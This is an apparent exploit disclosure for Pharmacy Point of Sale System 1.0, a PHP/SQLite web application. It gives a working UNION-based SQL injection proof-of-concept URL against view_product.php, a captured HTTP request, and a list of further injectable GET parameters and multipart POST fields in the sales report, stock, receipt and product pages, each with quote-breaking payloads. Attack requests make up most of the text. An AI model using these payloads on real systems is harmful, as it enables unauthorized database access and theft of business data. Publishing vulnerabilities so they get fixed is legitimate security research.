Pharmacy Point of Sale System 1.0 Exploit, 'Multiple' SQL Injection (SQLi)

# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
# Date: 28.09.2021
# Exploit Author: Murat
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Windows 10

# Pharmacy Point of Sale System v1.0 SQLi


GET /pharmacy/view_product.php?id=-1 HTTP/1.1
Host: localhost
Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close


POC:
https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--

-----------------------------------------------------------------------

#Other parameters with sql injection vulnerability;


==> /pharmacy/?date_from=&date_to=1'"&page=sales_report

==> /pharmacy/?date_from=1'"&date_to=&page=sales_report

==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1

==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true

==> /pharmacy/manage_product.php?id=-1'

==> POST /pharmacy/Actions.php?a=save_stock

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="supplier_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_id"

2'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="quantity"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="expiry_date"


==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"

5'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_code"

94102'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="category_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="name"

pHqghUme'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="description"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="status"

0'"
------------YWJkMTQzNDcw--
-

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD